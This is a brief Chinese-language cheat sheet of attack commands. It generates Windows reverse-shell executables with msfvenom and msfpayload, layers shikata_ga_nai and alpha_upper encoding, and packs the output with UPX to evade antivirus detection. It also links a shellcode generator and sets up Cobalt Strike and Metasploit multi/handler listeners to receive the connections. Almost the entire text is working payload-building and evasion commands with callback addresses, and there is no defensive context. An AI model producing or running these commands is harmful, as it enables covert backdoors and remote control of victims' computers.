msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
免杀 参照老版本,没有看官方文档
msfpayloadwindows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai-c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -ex86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o/root/Desktop/1.exe
upx加壳:upx -5/root/Desktop/1.exe
勾选自动生成脚本
https://sourceforge.net/projects/crisp-shellcode-generator/files/
设置参数
设置文件名
使用cobalt strike进行接受反弹
Listner – 设置名字,ip,端口,使用的加密
上线后
可Explore
msf
use exploit/multi/handler set payload windows/shell/reverse_tcp show options set LHOST 172.16.104.130 set LPORT 31337 exploitsession –v
session –I number